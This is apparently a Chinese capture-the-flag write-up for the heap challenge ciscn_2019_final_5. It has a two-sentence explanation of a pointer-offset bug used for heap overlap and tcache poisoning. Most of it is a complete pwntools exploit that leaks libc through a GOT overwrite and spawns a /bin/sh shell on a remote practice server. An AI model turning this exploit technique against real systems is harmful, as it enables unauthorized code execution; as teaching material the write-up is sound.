ciscn_2019_final_5

还是国赛时的题

最关键的点是,在new一个index为16的chunk时,返回的指针指向的其实是head+0x20的地方,所以可以通过在此处伪造一个head,然后free再申请,构造堆重叠。

然后修改tcache的fd,想怎么打怎么打。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#coding=UTF-8
from pwn import *
from LibcSearcher import *
#context.log_level='debug'
#sh=process("./ciscn_final_5.dms")
libc=ELF("libc.so.6")
sh=remote("pwn.buuoj.cn",20234)
def new(index,size,content):
sh.recvuntil("choice: ")
sh.sendline("1")
sh.recvuntil("index: ")
sh.sendline(str(int(index)))
sh.recvuntil("size: ")
sh.sendline(str(int(size)))
sh.recvuntil("content: ")
sh.send(content)
def delete(index):
sh.recvuntil("choice: ")
sh.sendline("2")
sh.recvuntil("index: ")
sh.sendline(str(int(index)))
def edit(index,content):
sh.recvuntil("choice: ")
sh.sendline("3")
sh.recvuntil("index: ")
sh.sendline(str(int(index)))
sh.recvuntil("content: ")
sh.send(content)

free_got=0x602018
puts_plt=0x400790
puts_got=0x602020
atoi_got=0x602078

new(16,0x10,p64(0)+p64(0x90))
new(1,0xc0,'1')
delete(0)
delete(1)
new(2,0x80,p64(0)+p64(0x21)+p64(0x6020E0))
new(3,0xc0,'3')
new(4,0xc0,p64(free_got)+p64(puts_got+1)+p64(atoi_got-4)+p64(0)*17+p32(0x10)*8)#get ptr
edit(8,p64(puts_plt)*2)
delete(1)
leak=u64(sh.recv(6)+'\x00\x00')
libcbase=leak-libc.symbols['puts']
log.success("libcbase: "+hex(libcbase))
edit(4,p64(libcbase+libc.symbols['system'])*2)
sh.recvuntil("choice: ")
sh.sendline("/bin/sh\x00")
sh.interactive()
文章目录
|